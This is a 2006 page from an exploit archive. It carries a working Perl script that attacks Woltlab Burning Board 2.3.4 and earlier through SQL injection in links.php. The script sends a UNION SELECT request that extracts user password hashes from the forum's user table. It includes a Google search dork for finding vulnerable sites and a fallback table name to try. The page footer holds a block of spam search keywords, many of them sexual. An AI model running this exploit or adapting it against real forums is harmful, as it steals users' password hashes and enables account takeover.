about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit




2006-05-20 Woltlab Burning Board <= 2.3.4 (links.php) SQL Injection Exploit
Rated as : High Risk

#!/usr/bin/perl

use IO::Socket;

print q{
################################################################################
##                                                                        
   ##

##  Woltlab Burning Board 2.3.4 <= "links.php" <= SQL
Injection Exploit       ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##  Exploit by       |  LoK-Crew                                          
   ##

##  Vulnerability by |  x82                                               
   ##
##  Googledork       |  inurl:/wbb2/links.php?cat                         
   ##
##  Usage            |  links.pl [server] [path]                          
   ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   
   ##
##                                                                        
   ##
################################################################################


};

$webpage = $ARGV[0];
$directory = $ARGV[1];

if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";


$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";
print "[+] Exploiting....\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		break;
	}
}

$wbb_dir =
"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage", PeerPort=>"80") || die
"[+] Can't connect to Server\n";

print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";


while ($answer = <$sock>) {
	if ($answer =~
/(................................)<\/b><\/font>/) {
		print "[+] Hash: $1\n";
		exit();
	}
	if ($answer =~ /SQL-DATABASE ERROR/) {

		print "[+] Try replacing bb1_users with bb2_users\n";
		break;
	}
}
close($sock);

print "[+] Exploit failed\n";
securitydot.net - 2006-05-20

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 09:58:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Rani mukar xxx.saxy Barbisex.c phpbbxs desi baba. c09-dns com_mtree. yn hub shop sql e sexi xxx w googlesear Gayxxxsexz Www.z1 sex news+for+c news+for+c www.Indian Anal video dvdplayer7 Ngentot an sexy open yahoo mese 511 www.leepun www.bebo.c WWW.Sify.C www.46913. www.trish indian sex HORSE (php) izicontent openSSH 4. php-nuke 2 277726.cn vBSEO 3.0. seks film Crack+Data www.malyal www.gb1228 www.quanbe manisha ko www.you to Sex 18 vid guest book SEXCARTON. php includ Wapeper www.hx0755 Www.Desiba italy